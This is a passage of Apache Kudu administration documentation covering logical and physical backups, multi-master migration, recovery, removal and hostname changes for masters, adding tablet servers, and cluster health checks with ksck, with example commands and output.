`kudu-backups`:\n\n[source,bash]\n----\nspark-submit --class org.apache.kudu.backup.KuduRestore kudu-backup2_2.11-1.10.0.jar \\\n --kuduMasterAddresses master1-host,master-2-host,master-3-host \\\n --rootPath hdfs:\/\/\/kudu-backups \\\n foo bar\n----\n\n==== Backup tools\n\nAn additional `backup-tools` jar is available to provide some backup exploration and\ngarbage collection capabilities. This jar does not use Spark directly, but instead\nonly requires the Hadoop classpath to run.\n\nCommands:\n\n* `list`: Lists the backups in the rootPath.\n* `clean`: Cleans up old backup data in the rootPath.\n\nNote: You can see the full list of command options at any time by passing the `--help` flag.\n\nBelow is an example execution which will print the command options:\n\n[source,bash]\n----\njava -cp $(hadoop classpath):kudu-backup-tools-1.10.0.jar org.apache.kudu.backup.KuduBackupCLI --help\n----\n\n[[backup_directory]]\n==== Backup Directory Structure\n\nThe backup directory structure in the `rootPath` is considered an internal detail\nand could change in future versions of Kudu. Additionally, the format and content\nof the data and metadata files is meant for the backup and restore process only\nand could change in future versions of Kudu. 
That said, understanding the structure\nof the backup `rootPath` and how it is used can be useful when working with Kudu backups.\n\nThe backup directory structure in the `rootPath` is as follows:\n\n[source,bash]\n----\n\/<rootPath>\/<tableId>-<tableName>\/<backup-id>\/\n .kudu-metadata.json\n part-*.<format>\n----\n\n* `rootPath`: Can be used to distinguish separate backup groups, jobs, or concerns.\n* `tableId`: The unique internal ID of the table being backed up.\n* `tableName`: The name of the table being backed up.\n** Note: Table names are URL encoded to prevent pathing issues.\n* `backup-id`: A way to uniquely identify\/group the data for a single backup run.\n* `.kudu-metadata.json`: Contains all of the metadata to support recreating the table,\n linking backups by time, and handling data format changes.\n** Written last so that failed backups will not have a metadata file and will not be\n considered at restore time or backup linking time.\n* `part-*.<format>`: The data files containing the table's data.\n** Currently 1 part file per Kudu partition.\n** Incremental backups contain an additional \u201cRowAction\u201d byte column at the end.\n** Currently the only supported format\/suffix is `parquet`.\n\n==== Troubleshooting\n\n===== Generating a table list\n\nTo generate a list of tables to back up, the `kudu table list` tool can be used\nalong with `grep`. Below is an example that will generate a list\nof all tables that start with `my_db.`:\n\n[source,bash]\n----\nkudu table list <master_addresses> | grep \"^my_db\\.\" | tr '\\n' ' '\n----\n\n*Note*: This list could be saved as a part of your backup process to be used\nat restore time as well.\n\n===== Spark Tuning\n\nIn general, the Spark jobs were designed to run with minimal tuning and configuration.\nYou can adjust the number of executors and resources to increase parallelism and performance\nusing Spark's\nlink:https:\/\/spark.apache.org\/docs\/latest\/configuration.html[configuration options].\n\nIf your tables are very wide and your default memory allocation is fairly low, you\nmay see jobs fail. To resolve this, increase the Spark executor memory. A conservative\nrule of thumb is 1 GiB per 50 columns.\n\nIf your Spark resources drastically outscale the Kudu cluster, you may want to limit the\nnumber of concurrent tasks allowed to run on restore.\n\n===== Backups on Kudu 1.9 and earlier\n\nIf your Kudu cluster is version 1.9 or earlier, you can still use the backup tool\nintroduced in Kudu 1.10 to back up your tables. However, because the incremental\nbackup feature requires server-side changes, you are limited to full backups only.\nThe process to back up tables is the same as documented above, but you will need to\ndownload and use the kudu-backup jar from a Kudu 1.10+ release. Before running\nthe backup job, you should adjust the configuration of your servers by setting\n`--tablet_history_max_age_sec=604800`. This is the new default value in Kudu 1.10+\nto ensure long running backup jobs can complete successfully and consistently.\nAdditionally, when running the backup you need to pass `--forceFull` to disable\nthe incremental backup feature. Each time the job is run, a full backup will be taken.\n
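As a sketch of this procedure, the history retention flag can be raised with\n`kudu tserver set_flag` and the backup then run with `--forceFull`. The server\naddresses and table names below are placeholders; also note that `set_flag`\nchanges do not survive a restart, so the flag should be persisted in each\ntablet server's gflagfile as well:\n\n[source,bash]\n----\n# Raise history retention to 7 days on each tablet server (repeat per server).\n# On versions where this flag is not marked runtime-safe, --force is required.\n$ sudo -u kudu kudu tserver set_flag tserver-01.example.com:7050 tablet_history_max_age_sec 604800 --force\n\n# Take a full backup of tables foo and bar; --forceFull disables incrementals.\nspark-submit --class org.apache.kudu.backup.KuduBackup kudu-backup2_2.11-1.10.0.jar \\\n --kuduMasterAddresses master-1-host,master-2-host,master-3-host \\\n --rootPath hdfs:\/\/\/kudu-backups \\\n --forceFull \\\n foo bar\n----\n\nNOTE: Taking full backups on a regular basis is far more resource and time intensive\nthan incremental backups. 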
It is recommended to upgrade to Kudu 1.10+ as soon as possible.\n\n[[physical_backup]]\n=== Physical backups of an entire node\n\nKudu does not yet provide built-in physical backup and restore functionality.\nHowever, it is possible to create a physical backup of a Kudu node (either\ntablet server or master) and restore it later.\n\nWARNING: The node to be backed up must be offline during the procedure, or else\nthe backed-up (or restored) data will be inconsistent.\n\nWARNING: Certain aspects of the Kudu node (such as its hostname) are embedded in\nthe on-disk data. As such, it's not yet possible to restore a physical backup of\na node onto another machine.\n\n. Stop all Kudu processes in the cluster. This prevents the tablets on the\n backed-up node from being re-replicated elsewhere unnecessarily.\n\n. If creating a backup, make a copy of the WAL, metadata, and data directories\n on each node to be backed up. It is important that this copy preserve all file\n attributes as well as sparseness (see the example after these steps).\n\n. If restoring from a backup, delete the existing WAL, metadata, and data\n directories, then restore the backup via move or copy. As with creating a\n backup, it is important that the restore preserve all file attributes and\n sparseness.\n\n. Start all Kudu processes in the cluster.\n
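As a minimal sketch of the copy in step 2, assuming the directory layout from\nthe examples below and a hypothetical backup destination of `\/backup\/kudu-master`,\nGNU `cp` can preserve both file attributes and sparseness:\n\n[source,bash]\n----\n# -a preserves ownership, permissions, and timestamps;\n# --sparse=always keeps sparse files sparse in the copy.\n$ sudo cp -a --sparse=always \/data\/kudu\/master\/wal \/backup\/kudu-master\/wal\n$ sudo cp -a --sparse=always \/data\/kudu\/master\/data \/backup\/kudu-master\/data\n----\n\nAn `rsync -a --sparse` copy would work as well; whichever tool is used, verify\nthat it preserves ownership and sparseness.\n\n== Common Kudu workflows\n\n[[migrate_to_multi_master]]\n=== Migrating to Multiple Kudu Masters\n\nFor high availability and to avoid a single point of failure, Kudu clusters should be created with\nmultiple masters. Many Kudu clusters were created with just a single master, either for simplicity\nor because Kudu multi-master support was still experimental at the time. This workflow demonstrates\nhow to migrate to a multi-master configuration. It can also be used to migrate from two masters to\nthree, with straightforward modifications. Note that the number of masters must be odd.\n\nWARNING: The workflow is unsafe for adding new masters to an existing configuration that already has\nthree or more masters. Do not use it for that purpose.\n\nWARNING: An even number of masters doesn't provide any benefit over having one fewer master. This\nguide should always be used for migrating to three masters.\n\nWARNING: All of the command line steps below should be executed as the Kudu UNIX user. The example\ncommands assume the Kudu UNIX user is `kudu`, which is typical.\n\nWARNING: The workflow presupposes at least basic familiarity with Kudu configuration management. If\nusing vendor-specific tools, the workflow also presupposes familiarity with them, and the vendor's\ninstructions should be used instead, as details may differ.\n\n==== Prepare for the migration\n\n. Establish a maintenance window (one hour should be sufficient). During this time the Kudu cluster\n will be unavailable.\n\n. Decide how many masters to use. The number of masters should be odd. Three or five node master\n configurations are recommended; they can tolerate one or two failures respectively.\n\n. Perform the following preparatory steps for the existing master:\n* Identify and record the directories where the master's write-ahead log (WAL) and data live. If\n using Kudu system packages, their default locations are \/var\/lib\/kudu\/master, but they may be\n customized via the `fs_wal_dir` and `fs_data_dirs` configuration parameters. The commands below\n assume that `fs_wal_dir` is \/data\/kudu\/master\/wal and `fs_data_dirs` is \/data\/kudu\/master\/data.\n Your configuration may differ. 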
For more information on configuring these directories, see the\n link:configuration.html#directory_configuration[Kudu Configuration docs].\n* Identify and record the port the master is using for RPCs. The default port value is 7051, but it\n may have been customized using the `rpc_bind_addresses` configuration parameter.\n* Identify the master's UUID. It can be fetched using the following command:\n+\n[source,bash]\n----\n$ sudo -u kudu kudu fs dump uuid --fs_wal_dir=<master_wal_dir> [--fs_data_dirs=<master_data_dir>] 2>\/dev\/null\n----\nmaster_data_dir:: existing master's previously recorded data directory\n+\nExample::\n+\n[source,bash]\n----\n$ sudo -u kudu kudu fs dump uuid --fs_wal_dir=\/data\/kudu\/master\/wal --fs_data_dirs=\/data\/kudu\/master\/data 2>\/dev\/null\n4aab798a69e94fab8d77069edff28ce0\n----\n+\n* Optional: configure a DNS alias for the master. The alias could be a DNS cname (if the machine\n already has an A record in DNS), an A record (if the machine is only known by its IP address),\n or an alias in \/etc\/hosts. The alias should be an abstract representation of the master (e.g.\n `master-1`).\n+\nWARNING: Without DNS aliases, it is not possible to recover from permanent master failures without\nbringing the cluster down for maintenance; as such, configuring DNS aliases is highly recommended.\n+\n. If you have Kudu tables that are accessed from Impala, you must update\nthe master addresses in the Apache Hive Metastore (HMS) database.\n* If you set up the DNS aliases, run the following statement in `impala-shell`,\nreplacing `master-1`, `master-2`, and `master-3` with your actual aliases.\n+\n[source,sql]\n----\nALTER TABLE table_name\nSET TBLPROPERTIES\n('kudu.master_addresses' = 'master-1,master-2,master-3');\n----\n+\n* If you do not have DNS aliases set up, see Step 11 in the\n<<perform-the-migration,Perform the migration>> section for updating HMS.\n+\n. Perform the following preparatory steps for each new master:\n* Choose an unused machine in the cluster. The master generates very little load,\n so it can be collocated with other data services or load-generating processes,\n though not with another Kudu master from the same configuration.\n* Ensure Kudu is installed on the machine, either via system packages (in which case the `kudu` and\n `kudu-master` packages should be installed), or via some other means.\n* Choose and record the directory where the master's data will live.\n* Choose and record the port the master should use for RPCs.\n* Optional: configure a DNS alias for the master (e.g. `master-2`, `master-3`, etc.).\n\n[[perform-the-migration]]\n==== Perform the migration\n\n. Stop all the Kudu processes in the entire cluster.\n\n. Format the data directory on each new master machine, and record the generated UUID. Use the\n following command sequence:\n+\n[source,bash]\n----\n$ sudo -u kudu kudu fs format --fs_wal_dir=<master_wal_dir> [--fs_data_dirs=<master_data_dir>]\n$ sudo -u kudu kudu fs dump uuid --fs_wal_dir=<master_wal_dir> [--fs_data_dirs=<master_data_dir>] 2>\/dev\/null\n----\n+\nmaster_data_dir:: new master's previously recorded data directory\n+\nExample::\n+\n[source,bash]\n----\n$ sudo -u kudu kudu fs format --fs_wal_dir=\/data\/kudu\/master\/wal --fs_data_dirs=\/data\/kudu\/master\/data\n$ sudo -u kudu kudu fs dump uuid --fs_wal_dir=\/data\/kudu\/master\/wal --fs_data_dirs=\/data\/kudu\/master\/data 2>\/dev\/null\nf5624e05f40649b79a757629a69d061e\n----\n\n. 
If using CM, add the new Kudu master roles now, but do not start them.\n* If using DNS aliases, override the empty value of the `Master Address` parameter for each role\n (including the existing master role) with that master's alias.\n* Add the port number (separated by a colon) if using a non-default RPC port value.\n\n. Rewrite the master's Raft configuration with the following command, executed on the existing\n master machine:\n+\n[source,bash]\n----\n$ sudo -u kudu kudu local_replica cmeta rewrite_raft_config --fs_wal_dir=<master_wal_dir> [--fs_data_dirs=<master_data_dir>] <tablet_id> <all_masters>\n----\n+\nmaster_data_dir:: existing master's previously recorded data directory\ntablet_id:: must be the string `00000000000000000000000000000000`\nall_masters:: space-separated list of masters, both new and existing. Each entry in the list must be\n a string of the form `<uuid>:<hostname>:<port>`\nuuid::: master's previously recorded UUID\nhostname::: master's previously recorded hostname or alias\nport::: master's previously recorded RPC port number\n+\nExample::\n+\n[source,bash]\n----\n$ sudo -u kudu kudu local_replica cmeta rewrite_raft_config --fs_wal_dir=\/data\/kudu\/master\/wal --fs_data_dirs=\/data\/kudu\/master\/data 00000000000000000000000000000000 4aab798a69e94fab8d77069edff28ce0:master-1:7051 f5624e05f40649b79a757629a69d061e:master-2:7051 988d8ac6530f426cbe180be5ba52033d:master-3:7051\n----\n\n. Modify the value of the `master_addresses` configuration parameter for both the existing master and the new masters.\n The new value must be a comma-separated list of all of the masters. Each entry is a string of the form `<hostname>:<port>`\nhostname:: master's previously recorded hostname or alias\nport:: master's previously recorded RPC port number\n\n. Start the existing master.\n\n. Copy the master data to each new master with the following command, executed on each new master\n machine.\n+\nWARNING: If your Kudu cluster is secure, in addition to running as the Kudu UNIX user, you must\n authenticate as the Kudu service user prior to running this command.\n+\n[source,bash]\n----\n$ sudo -u kudu kudu local_replica copy_from_remote --fs_wal_dir=<master_wal_dir> [--fs_data_dirs=<master_data_dir>] <tablet_id> <existing_master>\n----\n+\nmaster_data_dir:: new master's previously recorded data directory\ntablet_id:: must be the string `00000000000000000000000000000000`\nexisting_master:: RPC address of the existing master; must be a string of the form\n`<hostname>:<port>`\nhostname::: existing master's previously recorded hostname or alias\nport::: existing master's previously recorded RPC port number\n+\nExample::\n+\n[source,bash]\n----\n$ sudo -u kudu kudu local_replica copy_from_remote --fs_wal_dir=\/data\/kudu\/master\/wal --fs_data_dirs=\/data\/kudu\/master\/data 00000000000000000000000000000000 master-1:7051\n----\n\n. Start all of the new masters.\n+\nWARNING: Skip the next step if using CM.\n+\n. Modify the value of the `tserver_master_addrs` configuration parameter for each tablet server.\n The new value must be a comma-separated list of masters where each entry is a string of the form\n `<hostname>:<port>`\nhostname:: master's previously recorded hostname or alias\nport:: master's previously recorded RPC port number
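+\nFor example, assuming all three masters from this workflow use port 7051 and that\nflags are kept in gflagfiles, each tablet server's entry would look like the\nfollowing (mirroring the `master_addresses` entry set on the masters earlier):\n+\n[source,bash]\n----\n# In each tablet server's gflagfile:\n--tserver_master_addrs=master-1:7051,master-2:7051,master-3:7051\n----\n\n. Start all of the tablet servers.\n. 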
If you have Kudu tables that are accessed from Impala and you didn't set up\nDNS aliases, update the HMS database manually in the underlying database that\nprovides the storage for HMS.\n* The following is an example SQL statement you should run in the HMS database:\n+\n[source,sql]\n----\nUPDATE TABLE_PARAMS\nSET PARAM_VALUE =\n 'master-1.example.com,master-2.example.com,master-3.example.com'\nWHERE PARAM_KEY = 'kudu.master_addresses' AND PARAM_VALUE = 'old-master';\n----\n+\n* In `impala-shell`, run:\n+\n[source,sql]\n----\nINVALIDATE METADATA;\n----\n\n\n==== Verify the migration was successful\n\nTo verify that all masters are working properly, perform the following sanity checks:\n\n* Using a browser, visit each master's web UI. Look at the \/masters page. All of the masters should\n be listed there with one master in the LEADER role and the others in the FOLLOWER role. The\n contents of \/masters on each master should be the same.\n\n* Run a Kudu system check (ksck) on the cluster using the `kudu` command line\n tool. See <<ksck>> for more details.\n\n=== Recovering from a dead Kudu Master in a Multi-Master Deployment\n\nKudu multi-master deployments function normally in the event of a master loss. However, it is\nimportant to replace the dead master; otherwise a second failure may lead to a loss of availability,\ndepending on the number of available masters. This workflow describes how to replace the dead\nmaster.\n\nDue to https:\/\/issues.apache.org\/jira\/browse\/KUDU-1620[KUDU-1620], it is not possible to perform\nthis workflow without also restarting the live masters. As such, the workflow requires a\nmaintenance window, albeit a potentially brief one if the cluster was set up with DNS aliases.\n\nWARNING: Kudu does not yet support live Raft configuration changes for masters. As such, it is only\npossible to replace a master if the deployment was created with DNS aliases or if every node in the\ncluster is first shut down. See the <<migrate_to_multi_master,multi-master migration workflow>> for\nmore details on deploying with DNS aliases.\n\nWARNING: The workflow presupposes at least basic familiarity with Kudu configuration management. If\nusing vendor-specific tools, the workflow also presupposes familiarity with them, and the vendor's\ninstructions should be used instead, as details may differ.\n\nWARNING: All of the command line steps below should be executed as the Kudu UNIX user, typically\n`kudu`.\n\n==== Prepare for the recovery\n\n. If the deployment was configured without DNS aliases, perform the following steps:\n* Establish a maintenance window (one hour should be sufficient). During this time the Kudu cluster\n will be unavailable.\n* Shut down all Kudu tablet server processes in the cluster.\n\n. Ensure that the dead master is well and truly dead. Take whatever steps are needed to prevent it from\n accidentally restarting; this can be quite dangerous for the cluster post-recovery.\n\n. Choose one of the remaining live masters to serve as a basis for recovery. The rest of this\n workflow will refer to this master as the \"reference\" master.\n\n. Choose an unused machine in the cluster where the new master will live. The master generates very\n little load, so it can be collocated with other data services or load-generating processes, though\n not with another Kudu master from the same configuration.\n The rest of this workflow will refer to this master as the \"replacement\" master.\n\n. 
Perform the following preparatory steps for the replacement master:\n* Ensure Kudu is installed on the machine, either via system packages (in which case the `kudu` and\n `kudu-master` packages should be installed), or via some other means.\n* Choose and record the directory where the master's data will live.\n\n. Perform the following preparatory steps for each live master:\n* Identify and record the directory where the master's data lives. If using Kudu system packages,\n the default value is \/var\/lib\/kudu\/master, but it may be customized via the `fs_wal_dir` and\n `fs_data_dirs` configuration parameters. Please note that if `fs_data_dirs` is set to some directories\n other than the value of `fs_wal_dir`, it must be explicitly included in every command below where\n `fs_wal_dir` is also included. For more information on configuring these directories, see the\n link:configuration.html#directory_configuration[Kudu Configuration docs].\n* Identify and record the master's UUID. It can be fetched using the following command:\n+\n[source,bash]\n----\n$ sudo -u kudu kudu fs dump uuid --fs_wal_dir=<master_wal_dir> [--fs_data_dirs=<master_data_dir>] 2>\/dev\/null\n----\nmaster_data_dir:: live master's previously recorded data directory\n+\nExample::\n+\n[source,bash]\n----\n$ sudo -u kudu kudu fs dump uuid --fs_wal_dir=\/data\/kudu\/master\/wal --fs_data_dirs=\/data\/kudu\/master\/data 2>\/dev\/null\n80a82c4b8a9f4c819bab744927ad765c\n----\n+\n. Perform the following preparatory steps for the reference master:\n* Identify and record the directory where the master's data lives. If using Kudu system packages,\n the default value is \/var\/lib\/kudu\/master, but it may be customized via the `fs_wal_dir` and\n `fs_data_dirs` configuration parameters. Please note that if `fs_data_dirs` is set to some directories\n other than the value of `fs_wal_dir`, it must be explicitly included in every command below where\n `fs_wal_dir` is also included. For more information on configuring these directories, see the\n link:configuration.html#directory_configuration[Kudu Configuration docs].\n* Identify and record the UUIDs of every master in the cluster, using the following command:\n+\n[source,bash]\n----\n$ sudo -u kudu kudu local_replica cmeta print_replica_uuids --fs_wal_dir=<master_wal_dir> [--fs_data_dirs=<master_data_dir>] <tablet_id> 2>\/dev\/null\n----\nmaster_data_dir:: reference master's previously recorded data directory\ntablet_id:: must be the string `00000000000000000000000000000000`\n+\nExample::\n+\n[source,bash]\n----\n$ sudo -u kudu kudu local_replica cmeta print_replica_uuids --fs_wal_dir=\/data\/kudu\/master\/wal --fs_data_dirs=\/data\/kudu\/master\/data 00000000000000000000000000000000 2>\/dev\/null\n80a82c4b8a9f4c819bab744927ad765c 2a73eeee5d47413981d9a1c637cce170 1c3f3094256347528d02ec107466aef3\n----\n+\n. Using the two previously-recorded lists of UUIDs (one for all live masters and one for all\n masters), determine and record (by process of elimination) the UUID of the dead master.\n\n==== Perform the recovery\n\n. Format the data directory on the replacement master machine using the previously recorded\n UUID of the dead master. 
Use the following command sequence:\n+\n[source,bash]\n----\n$ sudo -u kudu kudu fs format --fs_wal_dir=<master_wal_dir> [--fs_data_dirs=<master_data_dir>] --uuid=<uuid>\n----\n+\nmaster_data_dir:: replacement master's previously recorded data directory\nuuid:: dead master's previously recorded UUID\n+\nExample::\n+\n[source,bash]\n----\n$ sudo -u kudu kudu fs format --fs_wal_dir=\/data\/kudu\/master\/wal --fs_data_dirs=\/data\/kudu\/master\/data --uuid=2a73eeee5d47413981d9a1c637cce170\n----\n+\n. Copy the master data to the replacement master with the following command:\n+\nWARNING: If your Kudu cluster is secure, in addition to running as the Kudu UNIX user, you must\n authenticate as the Kudu service user prior to running this command.\n+\n[source,bash]\n----\n$ sudo -u kudu kudu local_replica copy_from_remote --fs_wal_dir=<master_wal_dir> [--fs_data_dirs=<master_data_dir>] <tablet_id> <reference_master>\n----\n+\nmaster_data_dir:: replacement master's previously recorded data directory\ntablet_id:: must be the string `00000000000000000000000000000000`\nreference_master:: RPC address of the reference master; must be a string of the form\n`<hostname>:<port>`\nhostname::: reference master's previously recorded hostname or alias\nport::: reference master's previously recorded RPC port number\n+\nExample::\n+\n[source,bash]\n----\n$ sudo -u kudu kudu local_replica copy_from_remote --fs_wal_dir=\/data\/kudu\/master\/wal --fs_data_dirs=\/data\/kudu\/master\/data 00000000000000000000000000000000 master-2:7051\n----\n+\n. If using CM, add the replacement Kudu master role now, but do not start it.\n* Override the empty value of the `Master Address` parameter for the new role with the replacement\n master's alias.\n* Add the port number (separated by a colon) if using a non-default RPC port value.\n\n. If the cluster was set up with DNS aliases, reconfigure the DNS alias for the dead master to point\n at the replacement master.\n\n. If the cluster was set up without DNS aliases, perform the following steps:\n* Stop the remaining live masters.\n* Rewrite the Raft configurations on these masters to include the replacement master. See Step 4 of\n <<perform-the-migration, Perform the Migration>> for more details.\n\n. Start the replacement master.\n\n. Restart the remaining masters in the new multi-master deployment. While the masters are shut down,\n there will be an availability outage, but it should last only as long as it takes for the masters\n to come back up.\n\nCongratulations, the dead master has been replaced! To verify that all masters are working properly,\nconsider performing the following sanity checks:\n\n* Using a browser, visit each master's web UI. Look at the \/masters page. All of the masters should\n be listed there with one master in the LEADER role and the others in the FOLLOWER role. The\n contents of \/masters on each master should be the same.\n\n* Run a Kudu system check (ksck) on the cluster using the `kudu` command line\n tool. See <<ksck>> for more details.\n\n=== Removing Kudu Masters from a Multi-Master Deployment\n\nIn the event that a multi-master deployment has been overallocated nodes, the following steps should\nbe taken to remove the unwanted masters.\n\nWARNING: In planning the new multi-master configuration, keep in mind that the number of masters\nshould be odd and that three or five node master configurations are recommended.\n\nWARNING: Dropping the number of masters below the number of masters currently needed for a Raft\nmajority can incur data loss. 
To mitigate this, ensure that the leader master is not removed during\nthis process.\n\n==== Prepare for the removal\n\n. Establish a maintenance window (one hour should be sufficient). During this time the Kudu cluster\nwill be unavailable.\n\n. Identify the UUID and RPC address of the current leader of the multi-master deployment by visiting the\n`\/masters` page of any master's web UI. This master must not be removed during this process; its\nremoval may result in severe data loss.\n\n. Stop all the Kudu processes in the entire cluster.\n\n. If using CM, remove the unwanted Kudu master.\n\n==== Perform the removal\n\n. Rewrite the Raft configuration on the remaining masters to include only the remaining masters. See\nStep 4 of <<perform-the-migration,Perform the Migration>> for more details.\n\n. Remove the data directories and WAL directory on the unwanted masters. This is a precaution to\nensure that they cannot start up again and interfere with the new multi-master deployment.\n\n. Modify the value of the `master_addresses` configuration parameter for the masters of the new\nmulti-master deployment. If migrating to a single-master deployment, the `master_addresses` flag\nshould be omitted entirely.\n\n. Start all of the masters that were not removed.\n\n. Modify the value of the `tserver_master_addrs` configuration parameter for the tablet servers to\nremove any unwanted masters.\n\n. Start all of the tablet servers.\n\n==== Verify the removal was successful\n\nTo verify that all masters are working properly, perform the following sanity checks:\n\n* Using a browser, visit each master's web UI. Look at the \/masters page. All of the masters should\n be listed there with one master in the LEADER role and the others in the FOLLOWER role. The\n contents of \/masters on each master should be the same.\n\n* Run a Kudu system check (ksck) on the cluster using the `kudu` command line\n tool. See <<ksck>> for more details.\n\n=== Changing the master hostnames\n\nTo prevent long maintenance windows when replacing dead masters, DNS aliases should be used. If the\ncluster was set up without aliases, changing the hostnames can be done by following the steps below.\n\n==== Prepare for the hostname change\n\n. Establish a maintenance window (one hour should be sufficient). During this time the Kudu cluster\nwill be unavailable.\n\n. Note the UUID and RPC address of every master by visiting the `\/masters` page of any master's web\nUI.\n\n. Stop all the Kudu processes in the entire cluster.\n\n. Set up the new hostnames to point to the masters and verify all servers and clients properly\nresolve them.\n\n==== Perform the hostname change\n\n. Rewrite each master's Raft configuration with the following command, executed on all master hosts:\n+\n[source,bash]\n----\n$ sudo -u kudu kudu local_replica cmeta rewrite_raft_config --fs_wal_dir=<master_wal_dir> [--fs_data_dirs=<master_data_dir>] 00000000000000000000000000000000 <all_masters>\n----\n+\nFor example:\n+\n[source,bash]\n----\n$ sudo -u kudu kudu local_replica cmeta rewrite_raft_config --fs_wal_dir=\/data\/kudu\/master\/wal --fs_data_dirs=\/data\/kudu\/master\/data 00000000000000000000000000000000 4aab798a69e94fab8d77069edff28ce0:new-master-name-1:7051 f5624e05f40649b79a757629a69d061e:new-master-name-2:7051 988d8ac6530f426cbe180be5ba52033d:new-master-name-3:7051\n----\n\n. Change the masters' gflagfile so the `master_addresses` parameter reflects the new hostnames.\n\n. Change the `tserver_master_addrs` parameter in the tablet servers' gflagfiles to the new\nhostnames.
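+\nAs a sketch, using the new hostnames from the example above, the relevant\ngflagfile entries on the masters and tablet servers would become:\n+\n[source,bash]\n----\n# In each master's gflagfile:\n--master_addresses=new-master-name-1:7051,new-master-name-2:7051,new-master-name-3:7051\n# In each tablet server's gflagfile:\n--tserver_master_addrs=new-master-name-1:7051,new-master-name-2:7051,new-master-name-3:7051\n----\n\n. 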
Start up the masters.\n\n. To verify that all masters are working properly, perform the following sanity checks:\n\n.. Using a browser, visit each master's web UI. Look at the \/masters page. All of the masters should\n be listed there with one master in the LEADER role and the others in the FOLLOWER role. The\n contents of \/masters on each master should be the same.\n\n.. Run the command below to verify that all masters are up and listening. The UUIDs\nshould be the same and belong to the same master as before the hostname change:\n+\n[source,bash]\n----\n$ sudo -u kudu kudu master list new-master-name-1:7051,new-master-name-2:7051,new-master-name-3:7051\n----\n\n. Start all of the tablet servers.\n\n. Run a Kudu system check (ksck) on the cluster using the `kudu` command line\ntool. See <<ksck>> for more details. After startup, some tablets may be\nunavailable as it takes some time to initialize all of them.\n\n. If you have Kudu tables that are accessed from Impala, update the HMS\ndatabase manually in the underlying database that provides the storage for HMS.\n\n.. The following is an example SQL statement you should run in the HMS database:\n+\n[source,sql]\n----\nUPDATE TABLE_PARAMS\nSET PARAM_VALUE =\n 'new-master-name-1:7051,new-master-name-2:7051,new-master-name-3:7051'\nWHERE PARAM_KEY = 'kudu.master_addresses'\nAND PARAM_VALUE = 'master-1:7051,master-2:7051,master-3:7051';\n----\n+\n.. In `impala-shell`, run:\n+\n[source,sql]\n----\nINVALIDATE METADATA;\n----\n+\n.. Verify updating the metadata worked by running a simple `SELECT` query on a\nKudu-backed Impala table.
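+\nFor instance, a quick smoke test could look like the following; the table name\nhere is a placeholder:\n+\n[source,bash]\n----\n# Any lightweight query against a Kudu-backed table will do.\n$ impala-shell -q 'SELECT COUNT(*) FROM my_kudu_table;'\n----\n\n[[adding_tablet_servers]]\n=== Best Practices When Adding New Tablet Servers\n\nA common workflow when administering a Kudu cluster is adding additional tablet\nserver instances, in an effort to increase storage capacity, decrease load or\nutilization on individual hosts, increase compute power, etc.\n\nBy default, any newly added tablet servers will not be utilized immediately\nafter their addition to the cluster. Instead, newly added tablet servers will\nonly be utilized when new tablets are created or when existing tablets need to\nbe replicated, which can lead to imbalanced nodes. It's recommended to run\nthe rebalancer CLI tool just after adding a new tablet server into the cluster,\nas described in the enumerated steps below.\n\nAvoid placing multiple tablet servers on a single node. Doing so\nnullifies the point of increasing the overall storage capacity of a Kudu\ncluster and increases the likelihood of tablet unavailability when a single\nnode fails (the latter drawback is not applicable if the cluster is properly\nconfigured to use the\nlink:https:\/\/kudu.apache.org\/docs\/administration.html#rack_awareness[location\nawareness] feature).\n\nTo add additional tablet servers to an existing cluster, the\nfollowing steps can be taken to ensure tablet replicas are uniformly\ndistributed across the cluster:\n\n1. Ensure that Kudu is installed on the new machines being added to the\ncluster, and that the new instances have been\nlink:https:\/\/kudu.apache.org\/docs\/configuration.html#_configuring_tablet_servers[\ncorrectly configured] to point to the pre-existing cluster. Then, start up\nthe new tablet server instances.\n2. Verify that the new instances check in with the Kudu Master(s)\nsuccessfully. 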
A quick method for verifying they've successfully checked in\nwith the existing Master instances is to view the Kudu Master WebUI,\nspecifically the `\/tablet-servers` section, and validate that the newly\nadded instances are registered and heartbeating.\n3. Once the tablet server(s) are successfully online and healthy, follow\nthe steps to run the\nlink:https:\/\/kudu.apache.org\/docs\/administration.html#rebalancer_tool[\nrebalancing tool] which will spread existing tablet replicas to the newly added\ntablet servers.\n4. After the rebalancer tool has completed, or even during its execution,\nyou can check on the health of the cluster using the `ksck` command-line utility\n(see <<ksck>> for more details).\n\n[[ksck]]\n=== Checking Cluster Health with `ksck`\n\nThe `kudu` CLI includes a tool named `ksck` that can be used for gathering\ninformation about the state of a Kudu cluster, including checking its health.\n`ksck` will identify issues such as under-replicated tablets, unreachable\ntablet servers, or tablets without a leader.\n\n`ksck` should be run from the command line as the Kudu admin user, and requires\nthe full list of master addresses to be specified:\n\n[source,bash]\n----\n$ sudo -u kudu kudu cluster ksck master-01.example.com,master-02.example.com,master-03.example.com\n----\n\nTo see a full list of the options available with `ksck`, use the `--help` flag.\nIf the cluster is healthy, `ksck` will print information about the cluster, a\nsuccess message, and return a zero (success) exit status.\n\n----\nMaster Summary\n UUID | Address | Status\n----------------------------------+-----------------------+---------\n a811c07b99394df799e6650e7310f282 | master-01.example.com | HEALTHY\n b579355eeeea446e998606bcb7e87844 | master-02.example.com | HEALTHY\n cfdcc8592711485fad32ec4eea4fbfcd | master-03.example.com | HEALTHY\n\nTablet Server Summary\n UUID | Address | Status\n----------------------------------+------------------------+---------\n a598f75345834133a39c6e51163245db | tserver-01.example.com | HEALTHY\n e05ca6b6573b4e1f9a518157c0c0c637 | tserver-02.example.com | HEALTHY\n e7e53a91fe704296b3a59ad304e7444a | tserver-03.example.com | HEALTHY\n\nVersion Summary\n Version | Servers\n---------+-------------------------\n 1.7.1 | all 6 server(s) checked\n\nSummary by table\n Name | RF | Status | Total Tablets | Healthy | Recovering | Under-replicated | Unavailable\n----------+----+---------+---------------+---------+------------+------------------+-------------\n my_table | 3 | HEALTHY | 8 | 8 | 0 | 0 | 0\n\n | Total Count\n----------------+-------------\n Masters | 3\n Tablet Servers | 3\n Tables | 1\n Tablets | 8\n Replicas | 24\nOK\n----\n\nIf the cluster is unhealthy, for instance if a tablet server process has\nstopped, `ksck` will report the issue(s) and return a non-zero exit status, as\nshown in the abbreviated snippet of `ksck` output below:\n\n----\nTablet Server Summary\n UUID | Address | Status\n----------------------------------+------------------------+-------------\n a598f75345834133a39c6e51163245db | tserver-01.example.com | HEALTHY\n e05ca6b6573b4e1f9a518157c0c0c637 | tserver-02.example.com | HEALTHY\n e7e53a91fe704296b3a59ad304e7444a | tserver-03.example.com | UNAVAILABLE\nError from 127.0.0.1:7150: Network error: could not get status from server: Client connection negotiation failed: client connection to 127.0.0.1:7150: connect: Connection refused (error 61) 